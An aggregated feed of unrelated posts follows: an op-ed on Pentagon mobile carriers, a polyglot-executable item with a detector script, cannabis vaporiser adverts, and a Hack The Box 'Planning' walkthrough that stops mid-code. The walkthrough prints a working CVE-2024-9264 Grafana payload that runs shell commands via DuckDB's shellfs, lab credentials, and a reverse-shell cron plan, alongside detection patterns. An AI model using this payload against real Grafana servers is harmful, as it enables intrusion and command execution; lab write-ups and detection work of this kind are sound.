
China hacked our mobile carriers. So why is the Pentagon still buying from them?

19 January 2026 at 14:01

A freshly belligerent China is flexing its muscles in ways not seen since the USSR during the Cold War, forging a new illiberal alliance with Russia and North Korea. But the latent battlefield is farther reaching and more dangerous in the information age.

As we now know, over “a years long, coordinated assault,” China has stolen personal data from nearly every single American. This data lets them read our text messages, listen to our phone calls, and track our movements anywhere in the United States and around the world — allowing China to build a nearly perfect intelligence picture of the American population, including our armed forces and elected officials.

This state of affairs leaves corporate leaders, democracy advocates and other private citizens vulnerable to blackmail, cyber attacks and other harassment. Even our national leaders are not immune.

Last year, China targeted the phones of President Donald Trump and Vice President JD Vance in the course of the presidential campaign, reminding us that vulnerabilities in the network can affect even those at the highest levels of government. The dangers were drawn into stark relief earlier this year when Secretary of Defense Pete Hegseth used his personal phone to pass sensitive war plans to his colleagues, along with a high-profile journalist. That incident underscored what we’ve seen in Russia’s invasion of Ukraine, Ukraine’s Operation Spiderweb drone attacks on Russia, and on front lines the world over: Modern wars are run on commercial cellular networks, despite their vulnerabilities.

Many Americans would be surprised to learn that there is no impenetrable, classified military cellular network guiding the top-flight soldiers and weapons we trust to keep us safe. The cellular networks that Lindsay Lohan and Billy Bob Thornton sell us during NFL games are the same networks our troops and national security professionals use to do their jobs. These carriers have a long, shockingly consistent history of losing our personal data via breaches and hacks — as well as selling it outright, including to foreign governments. So it’s no wonder that, when the Pentagon asked carriers to share their security audits, every single one of them refused.

This isn’t a new revelation. Twenty years ago, I served as a Special Forces communications sergeant in Iraq. There, U.S. soldiers regularly used commercial BlackBerries — not because the network was secure, but because they knew their calls would connect. It’s surreal that two decades later, our troops are still relying on commercial phones, even though the security posture has not meaningfully improved.

A big part of the reason why this challenge persists stems from an all-too-familiar issue in our government: a wall of red tape that keeps innovative answers from reaching public-sector problems.

In this case, a solution to the Pentagon’s cell network challenge already exists. The Army requested it, and our soldiers need it. But when they tried to acquire this technology, they were immediately thwarted. Not by China or Russia — but by the United States government’s own bureaucracy.

It turns out that the Defense Department is required to purchase cellular service on a blanket, ten-year contract called Spiral 4. The contract was last renewed in early 2024 to AT&T, Verizon, T-Mobile and a few others, about a year before a solution existed. Yet despite this, rigid procurement rules dictate that the Pentagon will have to wait … presumably another eight years until the contract re-opens for competition.

The FCC recently eliminated regulations calling on telecoms to meet minimum cybersecurity standards, noting that the focus should instead be collaboration with the private sector. I agree. But to harness the full ingenuity of our private sector, our government should not be locking out startups. From Palantir to Starlink to Oura, startups have proven that they can deliver critical national security technologies, out-innovating entrenched incumbents and offering people services they need.

The Pentagon has made real, top-level policy changes to encourage innovation. But it must do more to ensure that our soldiers are equipped with the very best of what they need and deserve, and find and root out these pockets of stalled bureaucratic inertia. Because America’s enemies are real enough – our own red tape should not be one of them.

John Doyle is the founder and CEO of Cape. He previously worked at Palantir and as a Staff Sergeant in the Special Forces.

The post China hacked our mobile carriers. So why is the Pentagon still buying from them? first appeared on Federal News Network.

Soldier uses the Military OneSource app on his cellphone. (Courtesy of Military OneSource)

Windows? Linux? Browser? Same Executable

15 January 2026 at 04:00

We’ve been aware of projects like Cosmopolitan that allow you to crank out a single executable that will run on different operating systems. [Kamila] noticed that the idea was sound, but that the executables were large and there were some limitations. So she produced a 13K file that will run under Windows, Linux, or even in a Web browser. The program itself is a simple snake game.

There seems to be little sharing between the three versions. Instead, each version is compressed and stitched together so that each platform sees what it wants to see. To accommodate Windows, the file has to start with a PE header. However, there is enough flexibility in the header that part of the stub forms a valid shell script that skips over the Windows code when running under Linux.

So, essentially, Windows skips the “garbage” in the header, which is the part that makes Linux skip the “garbage” in the front of the file.

That leaves the browser. Browsers will throw away everything before an <HTML> tag, so that’s the easy part.
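The three faces described above (a PE header whose DOS stub doubles as a shell script, plus an HTML document later in the file) are easy to recognise once you know where to look. The following is an added example, not code from the article or from [Kamila]'s project: it reads the MZ header, follows e_lfanew to the PE signature, checks the DOS stub for shell text and the whole blob for an HTML tag, and reports which faces are present. The sample bytes are constructed inline and are only a layout sketch, not a working executable.

```python
"""Flag files that carry a Windows PE header together with a shell script in the
DOS stub or an HTML document further along (the three-way polyglot layout).
Added example; not code from the article or from the project it describes."""
import re
import struct

# Strings that commonly appear when a DOS stub doubles as a shell script.
SHELL_MARKERS = (b"#!/bin/sh", b"#!/bin/bash", b"exec ", b"tail -c", b"dd if=")


def pe_header_offset(data: bytes):
    """Return e_lfanew when data starts with an MZ header that points at a
    valid 'PE\\0\\0' signature, otherwise None."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 4 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    return e_lfanew


def analyse(data: bytes) -> dict:
    """Report which of the three faces (PE, shell, HTML) a blob presents."""
    off = pe_header_offset(data)
    # The DOS stub sits between the 64-byte MZ header and the PE signature;
    # Windows ignores it, so that is where shell text can live.
    stub = data[0x40:off] if off is not None else b""
    shell = any(marker in stub for marker in SHELL_MARKERS)
    html = re.search(rb"<html", data, re.IGNORECASE) is not None
    pe = off is not None
    return {
        "pe": pe,
        "shell_in_stub": shell,
        "html": html,
        "polyglot": pe and (shell or html),
    }


def _mz_header(e_lfanew: int) -> bytes:
    """Constructed 64-byte MZ header with e_lfanew written at offset 0x3C."""
    header = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", header, 0x3C, e_lfanew)
    return bytes(header)


def build_sample() -> bytes:
    """Constructed sample: MZ header, shell text in the stub, PE signature,
    then an HTML trailer. Only the byte layout, not a runnable program."""
    stub = b"#!/bin/sh\nexit 0\n"
    body = _mz_header(0x40 + len(stub)) + stub + b"PE\0\0" + b"\0" * 16
    return body + b"\n<html><body>snake</body></html>\n"


def build_plain_pe() -> bytes:
    """Constructed sample: an ordinary MZ/PE header with an empty stub."""
    return _mz_header(0x40) + b"PE\0\0" + b"\0" * 16


if __name__ == "__main__":
    for name, blob in (("polyglot", build_sample()),
                       ("plain pe", build_plain_pe()),
                       ("shell only", b"#!/bin/sh\necho hi\n")):
        print(name, analyse(blob))
```

Run over a directory of downloads, a hit on `polyglot` is a cheap triage signal: a legitimate Windows binary has no reason to carry `#!/bin/sh` in its DOS stub or an `<html>` element after its sections.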

Should you do this? Probably not. But if you needed to make this happen, this is a clear template for how to do it. If you want to go back to [Kamila’s] inspiration, we’ve covered Cosmopolitan and its APE format before.

MAESTRO Toolkit Exploiting VMware VM Escape Vulnerabilities

9 January 2026 at 14:48

Cybersecurity researchers from Huntress detail a major VM Escape attack where hackers took over host servers. Using a secret toolkit called MAESTRO, the attackers stayed hidden for over a year. Read the exclusive details on how this breach was stopped and how to protect your network.

Xylem Robotics’ Automated Innovations Improve Cannabis Tech

8 January 2026 at 07:51

In today’s fast and furious cannabis industry, making a reliably available product that’s consistently of the highest quality is a crucial component to finding success in the industry.

With a multitude of elements like shifting legal economies and breakthroughs in research constantly in play, being bogged down by inefficiencies can be the difference between becoming a household name and gathering dust on the shelf.

That’s why Eaze investor Jeff Wu set out to establish a new gold standard in vape and pre-roll manufacturing in the form of Xylem Robotics.

“We do what we say we can do,” Wu confirms. “We don’t advertise fluff, we don’t make up numbers—we strive to deliver precision with technology.”

Powered by a team of professionals with a deep well of talent and experience doing business with the US Government, as well as large retailers such as Apple and Target, Xylem Robotics is on a mission to bring the technology of tomorrow to today’s cannabis industry.

Meet Xylem

Xylem Robotics is a Houston-based business that’s quickly earned a reputation as a global leader in the development of intelligent, automated cannabis industry solutions, including milestones such as the innovation of proprietary robotic cartridge production systems and optimization for vaporizer cartridge supply chains.

Dedicated to helping businesses eliminate bottlenecks, achieve greater efficiency, and scale effectively, Xylem Robotics is here to help companies deliver a strong, sustained competitive advantage that takes every stage of the manufacturing process into account.

Want to learn more about the people-powered work at the heart of Xylem? Check out this wonderful documentary on Xylem’s work partnering with Chico Cannabis Company founder David Petersen, which covers his background as a military veteran and how it shaped his journey in cannabis manufacturing.

The Xylem Difference

Xylem’s automated solutions have been designed to maintain product quality while embracing industry-leading operating standards.

This means careful oversight that includes quality checks during every step of the manufacturing process, from the Xylem floor to your hands. This, along with their continued commitment to excellent customer service, continues to set Xylem apart.

Furthermore, Xylem systems utilize the latest in advanced technology to dispense material at industry-low temperatures, negating both terpene degradation and material oxidation. In combination with production speeds that would otherwise require a large team and alternative methods, this process provides businesses that purchase Xylem’s systems with a significant and valuable competitive advantage.

Cartridge Filling & Capping

Ready to have your carts capped and filled with reliable ease every time? Check out the Xylem X4: the world’s fastest vape cart filling machine.

The Xylem X4 fully automates cart filling and capping, greatly simplifying the vaporizer manufacturing process. As the fastest cart-filling system on the market, Xylem’s X4 is an unparalleled product in a crowded market. In fact, just one X4 machine can deliver the output equivalent to 20 workers at a fraction of the cost. That’s what makes the Xylem X4 cart-filling machine the best solution on the market for cannabis manufacturers.

Specs? We’ve got those! The Xylem X4 boasts a fill speed of 1650 units per hour. Additionally, it can handle all manner of liquid concentrates and any 510 top-filled vape cart unit with press, screw or click-in closures. Able to fill at temperatures as low as 45 °C, its fully automated process also includes in-line fills and immediate capping to preserve terpenes. Click here to request a demo.

Pre-Roll Infusion System

For many companies, the bottom line with infused pre-rolls is how efficiently they can get them filled and out to customers to enjoy. That’s why Xylem developed the Xylem Y2. Fully automated, this pre-roll infusion machine is capable of reliably producing 500-700 units per hour. Whether your brand is focused on paper cones, straight-rolled tubes, blunt wraps, or other form factors, Xylem’s Y2 can handle them all.

The Xylem Y2 is also capable of handling all forms of liquid concentrate fill material. That includes rosin, live resin, distillate, sauce, CBD, D8, and HHC — all of which can be filled at temperatures as low as 35 °C. Available infusion types include donut joints and hash holes, all overseen by one expert technician to reduce needs for surplus staffing while keeping your products at premium quality, thanks in part to the Xylem Y2’s precision pumping and temperature control settings.

You will also enjoy complete control over the location and the shape of the resin deposit with Xylem’s modifiable settings and precision linear slider. This allows the operator to precisely adjust the resin deposit location inside each pre-roll while simultaneously eliminating oil spots. Both straight lines and cone-shaped deposits can be easily achieved with Y2 to prevent canoeing and dripping for multiple styles of pre-rolls. See specs and learn more about how the Xylem Y2 can elevate your brand’s output today.

The post Xylem Robotics’ Automated Innovations Improve Cannabis Tech appeared first on Cannabis Now.

Pirate Group Anna’s Archive Copies 256M Spotify Songs in Data Scrape

23 December 2025 at 05:59

Spotify has confirmed a massive unauthorised data scrape involving 256 million track records and 86 million audio files. Learn how "Anna’s Archive" bypassed security, and why experts warn against downloading the leaked files.

AirVape’s Legacy PRO 2: This Portable Luxury Vaporizer Is Innovating Cannabis Recovery

6 November 2025 at 17:14

UFC heavyweight contender Curtis “Razor” Blaydes is a major player in the world of mixed martial arts. He’s what you get when you combine the raw strength of an athlete with the strategy of a chess player. Blaydes is recognized across the sport for his formidable wrestling and explosive takedowns. As he navigates the intense physical demands and injury risks inherent in elite MMA, Blaydes is finding that recovery isn’t just about taking a break, it’s also a secret weapon that combats the risk of injury, enhances performance, and increases the potential for overall athletic progress.

Strategic Approaches to Cannabis Recovery

In his quest for the Holy Grail of peak performance and career longevity, Blaydes is pioneering state-of-the-art recovery methods through continuous improvement and a disciplined post-training regimen. Blaydes is not alone. Performance-tuning the recovery process is now an essential component of wellness as athletes balance healing, pain management, and stress reduction. The cornerstone of Blaydes’ recovery program is the AirVape Legacy PRO 2, a bespoke combustion-free experience that transforms the therapeutic benefits of cannabis.

“I’m always looking for ways to recover smarter,” Blaydes says. “The AirVape Legacy PRO 2 is clean, fast, and helps me wind down the right way.”

According to AirVape co-owner Gary Szilagyi, “what sealed the [partnership] was the shared philosophy: we both believe cannabis can be used intentionally for recovery, mental clarity, and focus, not just recreation. It felt like a natural fit: his discipline and story amplified our vision, and our technology elevated his routine.”

The Legacy PRO 2 is AirVape’s next evolution of their original award-winning Legacy PRO dry herb vaporizer. And the love for this device runs deep. As AirVape’s first user-centered upgrade, it reflects direct input from the brand’s dedicated following—a community that’s helped cement its place among the top names in vaporization. As the company website states, they’re “taking everything users loved about the original Legacy Pro and enhancing it with smarter design, refined aesthetics, and user-driven upgrades.”

If you, like Blaydes, are interested in joining the AirVape community and utilizing cannabis as part of your health and wellness routine, then you’ve found the right company. Their entire ethos is centered on promoting wellness through innovation. Founder Roland Szegi, a former athlete, envisioned transforming the portable vaporizer landscape. In the sequel to the original AirVape Legacy, he released a device that captured high performance, elegance, and mindfulness.

Setting a New Gold Standard

The AirVape Legacy PRO 2 is a sleek, ergonomic device that fits naturally in the palm of your hand. Designed for modern wellness seekers, it’s the cornerstone of a discreet ritual—an elegant piece of technology that hides in plain sight while subtly masking the aroma of the herbs within.

Wrapped in hand-applied cork fabric with 24k gold flakes over a gunmetal frame, the vape balances modern design with artisanal detail—no two devices are exactly alike. The gold freckles upon the cork detailing are an homage to AirVape’s dedication to quality materials that produce a session’s luxury experience. Engraved into the leather is its name, bordered with delicate stitching.

While the cork is aesthetically pleasing, it also functions to insulate the device’s heat and to maintain temperature precision. While the top vaporization devices on the market are quick to heat up within 30-40 seconds, the Legacy PRO 2 heats up in just 15 seconds. The hybrid heating methodology, gold-plated filters, detailing, and the glass airpath level up the original Legacy design. By integrating both conduction and convection, the device achieves true hybrid heating—a rare innovation that sets it apart from competitors.

Blaydes had already been using vaporizers as part of his recovery routine, but when he tried the Legacy Pro, he immediately appreciated the design, build quality, and clean vapor experience. The glass is also easy to maintain, with a replaceable battery to enhance the lifespan of the device. The user’s ability to precisely adjust the temperature puts control back into the user’s hands to achieve efficient and even heating of the chamber. You can modify the temperature per strain and terpene profile for the best flavor and extend session time through temperature modulation.

Unparalleled Functionality

AirVape stood out to Blaydes because of his open advocacy for innovative, cleaner recovery methods. That innovation, the Legacy PRO 2, arrives assembled and ready to charge with a universally compatible USB-C port. To turn the device on, click the button three times; it either times out on its own or shuts down when the button is clicked three times again. The Legacy PRO 2 provides a visual display that is used to turn the temperature up and down, adjust session length, gauge battery life, and to say goodbye with a “ciao” and a smile when turned off.

This dual-use vape can hold flower or concentrate, adding convenience to a busy lifestyle. The gold-plated chamber isn’t just for looks— the chamber is interchangeable and easy to replace. It is an innovation on traditional heating devices with gold, a metal that’s traditionally been in medical devices, thanks to its stable characteristics. We’re impressed by how AirVape seamlessly blends form and function to create a device that isn’t just aesthetically pleasing but effective at what it’s designed to do.

The Legacy PRO 2 also comes with two important accessories. First, there’s a loading tool that presses flower from the grinder into a compact puck that’s easy to take in and out of the device, making cleanup easy. Secondly, there’s a glass piece, reminiscent of the top of a water pipe, that helps with cooling the vapor further when playing with higher temperatures and wax. It’s easier to customize and pursue hybrid sessions by incorporating flower and sugar at the same time. The device’s innovations are born from real challenges compiled from AirVape’s dedicated fan base, making this the clean and innovative design Blaydes relies on.

Rethinking The Recovery Paradigm

Together, Blaydes and Air Vape are pushing cannabis and sports with their willingness to educate other athletes about alternatives to traditional painkillers. “What’s really striking is how authentic [Blades’] involvement is,” describes Szilagyi. “He’s not just endorsing a product; he’s sharing his own recovery journey.” Blaydes is championing the paradigm shift in athletic recovery. Acceptance of cannabis in sport is growing as regulations around flower use continue to vary.

Vaporization devices like the AirVape PRO 2 play a vital role in supporting athletic wellness and performance. They offer an opportunity for all of us to channel our inner Blaydes as we strive for peak potential.

The post AirVape’s Legacy PRO 2: This Portable Luxury Vaporizer Is Innovating Cannabis Recovery appeared first on Cannabis Now.

Discover The Vault Grinder Storz and Bickel Vaporisers and Aztec CBD

By: TeamVault
30 October 2025 at 10:19

CBD and Vaping Essentials Promo

🔥 Elevate Your CBD Experience – Explore the Best Vaporizers, Pods & Grinders at The Vault Headshop!

If you’re looking to take your CBD and vaping journey to the next level, The Vault Headshop has everything you need: premium CBD vape kits, high-performance vaporizers, durable grinders and exclusive discount codes. Let’s explore some of our top picks for this season.

We’re proud to feature premium products from Storz & Bickel, Aztec CBD, and of course, yours truly – The Vault. Whether you’re after top-quality accessories, trusted CBD ranges, or collectible seeds, we aim to bring together the best in the industry for our customers.

⚙️ Venty Vaporiser Complete Set – Precision Meets Power

Key Features:

  • Rapid 20-second heat-up
  • Adjustable airflow & temperature
  • Long-lasting battery life
  • Premium German engineering
  • Compact, portable design

For those who value flavour precision, vapour density, and portability, the Venty Vaporiser delivers an unmatched vaping experience. Designed by the experts at Storz & Bickel, the Venty combines powerful heating technology with a fast heat-up time and precise temperature control for the ultimate session.

With adjustable airflow, USB-C charging, and Bluetooth app connectivity, this vaporiser stands at the cutting edge of innovation. Whether you’re using dry herbs or CBD flower, the Venty ensures consistent, smooth vapour with every draw.

👉 Buy the Venty Vaporiser

🔥 Volcano Hybrid Vaporiser by Storz & Bickel – The Gold Standard

Key Features:

  • Dual inhalation system (balloon + whip)
  • Rapid heat-up and precision temperature control
  • App connectivity via Bluetooth
  • Storz & Bickel’s premium German build quality

The Volcano Hybrid is the pinnacle of vaporiser technology — a desktop unit known worldwide for its superior vapour quality and engineering excellence. Made by Storz & Bickel, this device offers both balloon and whip inhalation, giving you complete control over your session.

Equipped with digital temperature controls, a clear touch display, and Bluetooth app functionality, the Volcano Hybrid ensures precision and consistency, making it a favourite among seasoned users and medical CBD consumers alike.

👉 Buy the Volcano Hybrid

🌈 Aztec CBD Pod System 2000mg – Premium Quality, Incredible Flavour

The Aztec CBD Pod System 2000mg is the perfect starter kit for anyone looking to enjoy the smooth, flavour-rich benefits of CBD.

Each pod delivers up to 2000 puffs of premium broad-spectrum CBD, carefully blended to provide a relaxing, balanced experience.

Choose from 15 delicious strain-inspired flavours: Blue Dream, Blueberry Kush, Buddah Haze, Fruit Punch, GG4, Grape Fruit, Mango Kush, Pineapple Kush, Raspberry Kush, Sherbet OG, Strawberry Ice, Super Lemon Haze, Watermelon Gelato, White Widow, and Zkittlez.

Each flavour captures the authentic terpene profiles of your favourite cannabis strains, providing a natural taste and smooth inhale. Perfect for on-the-go use, the Aztec Pod System is lab-tested, THC-free, and crafted using premium hemp extract for reliable quality.

💨 Key Features:

  • 2000mg CBD per pod
  • Up to 2000 puffs
  • Rechargeable pod system
  • THC-free & lab-certified
  • Easy to use for beginners and enthusiasts

👉 Shop Aztec CBD Pod Systems

The Vault 63mm Heavy-Duty Metal Grinder – Built to Last

Key Features:

  • 63mm 4-part design with pollen catcher
  • Heavy-duty aluminium build
  • Smooth, even grinding action
  • The Vault custom branding

No vaping or herbal session is complete without a reliable grinder, and The Vault 63mm Heavy-Duty Metal 4-Part Grinder delivers exceptional performance. With its robust design, precision-cut teeth, and fine mesh screen, it ensures a perfect grind every time — preserving flavour and texture.

Branded with the signature The Vault logo, this grinder not only performs flawlessly but looks great in any collection.

👉 Buy The Vault 63mm Large Grinder

OFFERS

You can get yourself 10% OFF any of these products (plus any other products sitewide) with code: HEAD10

Halloweed Special Discounts still running – Limited Time Only!

Take advantage of our exclusive offers this season:

  • 🎃 33% OFF all Phoenix Seeds with code HALLOW33D — available only until Halloween’s witching hour!

Now’s the perfect time to stock up on your favourite CBD and head shop essentials.

🛒 Shop Smart. Vape Better. Relax Naturally.

Newsletter Sign Up

Make sure you never miss another Vault Giveaway or Promo – sign up for our newsletter!

Legal Disclaimer: The competition winners will have their prizes sent to them via recorded delivery. Please, double-check you’re giving us your full address correctly. If you win the competition but don’t receive your prize, we cannot resend competition prizes, so you’ll have to raise this with your local delivery service (In the UK, for example, this would be Royal Mail).

Remember: It is illegal to germinate cannabis seeds in many countries including the UK. It is our duty to inform you of this fact and to urge you to obey all of your local laws to the letter. The Vault only ever sells or sends out seeds for souvenir, collection or novelty purposes.

The post Discover The Vault Grinder Storz and Bickel Vaporisers and Aztec CBD first appeared on Cannabis Seeds News.

The Vault Headshop Fresh Line-Up of Pulsar Vapes!

By: TeamVault
22 October 2025 at 09:55

Hey vapor-enthusiasts and savvy shoppers — we’ve got exciting news for you!

At The Vault Headshop, we’re thrilled to announce the arrival of three fresh new editions of the Pulsar APX V3 dry-herb vapouriser. Whether you’re after style, portability, or top-tier function, we’ve got you covered. And yes — we’ve got a sweet treat for you too: use code “HEAD10” at checkout to get 10% off your purchase plus all other products site wide.

Ready to dive in? Let’s explore each one, get to know the features, and see which edition fits you best.

Pulsar APX V3 – Wood Grain Edition

Style meets substance — this one’s for the person who loves organic vibes but doesn’t compromise on performance.

Key features:

  • Large ceramic heating chamber (~0.5 g capacity) for longer sessions.
  • Five preset temperature settings to customise flavour and cloud balance.
  • Rapid 30-second heat-up time.
  • Haptic feedback and LED display to keep you informed.
  • “Cash” mode (high-temp blast) for full extraction of your herbs.

Why you’ll love it:

  • The Wood Grain finish gives the unit a classy, natural aesthetic — more than your average vapouriser.
  • Under the hood, you’re still getting all the cutting-edge features of the APX V3 line.
  • Ideal for the user who wants to stand out a little and carry something premium yet pocket-friendly.

Buy Now

Pulsar APX V3 – Emerald Green Edition

Ready for a pop of colour? The Emerald Green edition brings vibrant style into your vaping game.

Features to love:

  • 1600 mAh battery for strong session life.
  • Compact and portable (31 mm x 23 mm x 101 mm).
  • Single-button operation for easy use.
  • Isolated air path and conduction heating for clean, flavourful vapour.

Why you’ll love it:

  • The bold green finish sets it apart from the usual black or silver vapourisers, adding personality to your setup.
  • While the exterior is bright, the internal tech remains rock solid — it’s the same trusted APX V3 performance.
  • Perfect for users who want something fun and fresh without sacrificing functionality.

Buy Now

Pulsar APX V3 – Jet Black Edition

For those who prefer a sleek, minimalist look with cutting-edge functionality, the Jet Black edition is all business. It’s stealthy, powerful, and now even more convenient with USB-C charging.

Features worth noting:

  • USB-C charging for faster, easier power-ups.
  • Classic black finish for a timeless, stealthy aesthetic.
  • 0.5 g ceramic chamber with conduction heating.
  • Five temperature settings and haptic feedback.
  • Compact, durable design for everyday use.

Buy Now

Why the Pulsar APX V3 Range Belongs in Your Collection

At The Vault, we look for gear that hits three key boxes: performance, style, and affordability — and these Pulsar APX V3 editions check all three.

  • Real value: one of the most efficient, affordable dry-herb vapourisers on the market.
  • Choice of styles: wood grain, emerald pop, or stealth black — something for every vibe.
  • The features that matter: quick heat-up, multiple temperature settings, long battery life, and premium build quality.

These devices perfectly blend functionality and flair, making them a must-have for any head-shop enthusiast.

Don’t Forget: 10% Off with Code HEAD10

Because we’re stoked about this launch, we’re giving you 10% off on all Pulsar APX V3 editions.

Just enter HEAD10 at checkout to claim your savings.


The post The Vault Headshop Fresh Line-Up of Pulsar Vapes! first appeared on Cannabis Seeds News.

Hack The Box: Planning Machine Walkthrough – Easy Difficulty

By: darknite
13 September 2025 at 10:58

Introduction to Planning:

In this write-up, we will explore the “Planning” machine from Hack The Box, categorised as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.

Objective:

The goal of this walkthrough is to complete the “Planning” machine from Hack The Box by achieving the following objectives:

User Flag:

During reconnaissance, extensive fuzzing was required to identify a Grafana instance vulnerable to CVE-2024-9264—a critical flaw enabling arbitrary command execution through unsanitized SQL inputs in the DuckDB CLI. By deploying a proof-of-concept exploit, I successfully extracted files and ran commands, gaining entry to the Grafana container but not the underlying host. Subsequent enumeration uncovered valid credentials for the user “enzo,” which granted SSH access to the host system.

Root Flag:

Once on the host, I discovered the Crontab-UI service—a web-based tool for managing cron jobs—running on localhost:8000 and secured with Basic Authentication. Leveraging the earlier credentials for the “enzo” user, I authenticated to the interface and added a malicious cron job configured to establish a reverse shell connection.

Enumerating the Machine

Reconnaissance:

Nmap Scan:

Begin with a network scan to identify open ports and running services on the target machine.

nmap -sC -sV -oA initial 10.10.11.68

Nmap Output:

┌─[dark@parrot]─[~/Documents/htb/planning]
└──╼ $nmap -sC -sV -oA initial 10.10.11.68 
# Nmap 7.94SVN scan initiated Wed Sep 10 08:09:24 2025 as: nmap -sC -sV -oA initial 10.10.11.68
Nmap scan report for 10.10.11.68
Host is up (0.048s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 62:ff:f6:d4:57:88:05:ad:f4:d3:de:5b:9b:f8:50:f1 (ECDSA)
|_  256 4c:ce:7d:5c:fb:2d:a0:9e:9f:bd:f5:5c:5e:61:50:8a (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://planning.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 10 08:09:35 2025 -- 1 IP address (1 host up) scanned in 11.35 seconds
┌─[dark@parrot]─[~/Documents/htb/planning]
└──╼ $

Analysis:

  • Port 22 (SSH): OpenSSH 9.6p1 providing remote shell access.
  • Port 80 (HTTP): nginx 1.24.0 (per the scan banner), which redirects to http://planning.htb/.

Web Application Exploration:

The website for Edukate appears to be a standard educational platform.

What is Edukate?

Edukate is a free educational website template designed for online learning platforms and academic institutions. Its intuitive layout improves user engagement, while its clean, developer-friendly codebase makes customization simple. Built with Sass for easy maintenance, Edukate is optimized for page speed to deliver fast loading times and lower bounce rates. It is fully cross-browser compatible, ensuring a smooth experience across all major browsers, and SEO-friendly to help boost search engine rankings.

Source: themewagon/Edukate

No usable elements are present here.

Nothing noteworthy here either.

Web Enumeration:

Perform web enumeration to discover potentially exploitable directories and files.

gobuster vhost -u http://planning.htb -w combined_subdomains.txt --append-domain -t 50

Gobuster Output:

┌─[dark@parrot]─[/opt/SecLists/Discovery/DNS]
└──╼ $gobuster vhost -u http://planning.htb -w combined_subdomains.txt --append-domain -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://planning.htb
[+] Method:          GET
[+] Threads:         50
[+] Wordlist:        combined_subdomains.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: grafana.planning.htb Status: 302 [Size: 29] [--> /login]
===============================================================
Finished
===============================================================
┌─[dark@parrot]─[/opt/SecLists/Discovery/DNS]
└──╼ $

Analysis:

Discovery: grafana.planning.htb

  • Gobuster found a valid virtual host: grafana.planning.htb.
  • This is likely an internal service meant for the organization’s team, not a public endpoint.
  • Since it contains grafana, it strongly suggests it is a Grafana dashboard instance.

Grafana Application

The grafana.planning.htb subdomain loads successfully and displays the Grafana login page.

We should be able to log in using the credentials provided by Hack The Box.

  • Username: admin
  • Password: 0D5oT70Fq13EvB5r

We need to inspect the traffic using Burp Suite.

First, I noticed that the endpoint /api/user/auth-tokens-rotate is available here.

We successfully gained access to the Grafana dashboard.

We also confirmed that the Grafana instance is running version 11.0.0.

There are numerous tokens being rotated here.

This is what the response looks like in Burp Suite.

Critical SQL Expression Vulnerability in Grafana Enabling Authenticated LFI/RCE

This vulnerability targets Grafana 11’s experimental SQL Expressions feature, which allows users to post-process query results via custom SQL using DuckDB. The flaw arises because user input isn’t properly sanitized before being sent to the DuckDB CLI, enabling remote code execution (RCE) or arbitrary file reads. The root cause is unfiltered input passed directly to the DuckDB command-line interface. The CVSS v3.1 score is 9.9 (Critical).

Grafana doesn’t include DuckDB by default. For exploitation, DuckDB must be installed on the server and reachable through Grafana’s PATH. If it is absent, this flaw cannot be exploited on that instance.

Using a PoC, we can exploit this flaw to read system files, demonstrating its impact and severity.

Let’s search Google for potential exploits targeting Grafana v11.0.0

This flaw enables authenticated users to attain remote code execution (RCE). I exploited it using the publicly available proof-of-concept from Nollium’s GitHub repository.

We successfully retrieved the /etc/passwd file.

When we ran the whoami command, it returned root, which is unexpected.

Let’s set up our listener.

Unfortunately, we were unable to execute the command due to an error.

As suspected, this is running inside a Docker container.

The environment variables reveal the Grafana admin credentials:

  • GF_SECURITY_ADMIN_USER=enzo
  • GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!.

Exploit CVE-2024-9264 using Burp Suite.

The api/ds/query endpoint is available in Grafana, and we can leverage it for this exploit.

If the full path is not specified, it responds with a “Not Found” message.

However, attempting to execute the full path results in an “Unauthorized” response.

It’s still the same; we need to send the JSON data here.

After replacing the token, it worked.

{
  "from": "1729313027261",
  "queries": [
    {
      "datasource": {"name": "Expression", "type": "__expr__", "uid": "__expr__"},
      "expression": "SELECT 1; install shellfs from community; LOAD shellfs; SELECT * FROM read_csv(\"whoami > /tmp/output.txt 2>&1 |\")",
      "hide": false,
      "refId": "B",
      "type": "sql",
      "window": ""
    }
  ],
  "to": "1729334627261"
}

This JSON payload is a crafted query sent to Grafana’s api/ds/query endpoint. It uses the Expression data source with an SQL expression to run a sequence of commands: first installing and loading the shellfs extension, then executing whoami and redirecting the output to /tmp/output.txt. This effectively demonstrates command execution through CVE-2024-9264.
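From the defender's side, the request shape above is what a detection rule should key on. The following Python script is an added example, not part of the walkthrough or the Grafana project: it assumes a reverse proxy in front of Grafana logs POST bodies for /api/ds/query as one JSON record per line (the record fields user, path and body, and the sample records themselves, are constructed), flags SQL Expression queries that carry the DuckDB constructs the payload relies on, and includes the mitigation check mentioned above, whether a duckdb binary is reachable on PATH.

```python
"""Detection helper for the CVE-2024-9264 request pattern.

Added example, not part of the original walkthrough or of Grafana. It
assumes Grafana's /api/ds/query request bodies are available to the
defender as one JSON record per line (e.g. from a proxy or WAF that logs
POST bodies); the record layout and the sample lines are constructed.
"""
import json
import re
import shutil

# DuckDB constructs that turn a SQL Expression into file read / command execution.
SUSPICIOUS_SQL = [
    re.compile(r"\binstall\s+\w+\s+from\s+community\b", re.I),      # community extension install
    re.compile(r"\bload\s+shellfs\b", re.I),                         # shellfs exposes shell pipes as files
    re.compile(r"\bread_(csv|text|blob|json)(_auto)?\s*\(", re.I),   # arbitrary file read
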